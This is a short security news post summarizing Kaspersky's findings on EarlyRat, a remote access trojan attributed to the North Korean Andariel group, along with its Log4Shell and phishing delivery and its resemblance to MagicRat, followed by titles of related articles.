EarlyRat Malware Family
admin
admin 9 months ago
admin #news

EarlyRat : Hidden Malware Family Exposed By North Korean Hackers

Kaspersky Lab researchers have uncovered a previously undocumented malware family and identified operational errors committed by Andariel, a faction of the North Korean Lazarus Group. Kaspersky Lab, in its report, analyzed the tactics of the Andariel group and identified a new threat called "EarlyRat".

The Andariel group is known for using DTrack malware and Maui ransomware. Andariel first gained attention in mid-2022. Using the Log4Shell vulnerability, Andariel delivered various families of malware to target devices, including YamaBot and MagicRat, as well as updated versions of NukeSped and DTrack.


An investigation by Kaspersky Lab showed that Andariel initiates the infection by executing a Log4Shell exploit that downloads additional malware from a command and control server ( C2 server ).


It is noteworthy that the researchers observed the execution of commands by a human operator and noted numerous errors and typos, suggesting that an inexperienced attacker was behind the operation.


The researchers also identified a new malware family called EarlyRat. Initially, it was assumed that EarlyRat samples were downloaded via Log4Shell, but further analysis showed that phishing documents were the main delivery mechanism for EarlyRat.


EarlyRat, like many other remote access trojans ( RAT ), upon activation collects system information and transmits it to the C2 server in a specific pattern. The transmitted data includes unique computer identifiers (IDs) and requests that are encrypted using the cryptographic keys specified in the ID field.


In terms of functionality, EarlyRat is simple, mostly limited to executing commands. Interestingly, EarlyRat shares some common similarities with the Lazarus MagicRat malware. Similarities lie in the use of frameworks (QT for MagicRat and PureBasic for EarlyRat) and the limited functionality of both RAT Trojans.


MagicRAT was first seen on victim networks using VMware Horizon servers connected to the internet. According to the researchers, the Trojan was created using the Qt framework to make analysis more difficult and less likely to be detected by security systems.


To gain a foothold in the system, the Trojan creates scheduled tasks. The functionality of MagicRat is quite simple - the malware provides attackers with a remote shell that allows them to execute arbitrary commands and manipulate the victim's files.

0
462

Login to Post comments

Comments 0
New malware Fractureiser threatens the safety of Minecraft players

New malware Fractureiser threatens the safety of Minecraft players

1673775682.png
admin
 10 months ago
SilentBob: Team TNT Malware Campaign Targeting Misconfigured Servers

SilentBob: Team TNT Malware Campaign Targeting Misconfigured Servers

1673775682.png
admin
 9 months ago
JanelaRAT: Remote Access Trojan - A Portuguese Malware

JanelaRAT: Remote Access Trojan - A Portuguese Malware

1673775682.png
admin
 8 months ago
Anatsa Banking Malware Spreads On Google Play Store

Anatsa Banking Malware Spreads On Google Play Store

1673775682.png
admin
 9 months ago
Rouge Android Hacking Botnet + Setup Method

Rouge Android Hacking Botnet + Setup Method

1711171630.jpeg
Mr. ShellCode
 2 months ago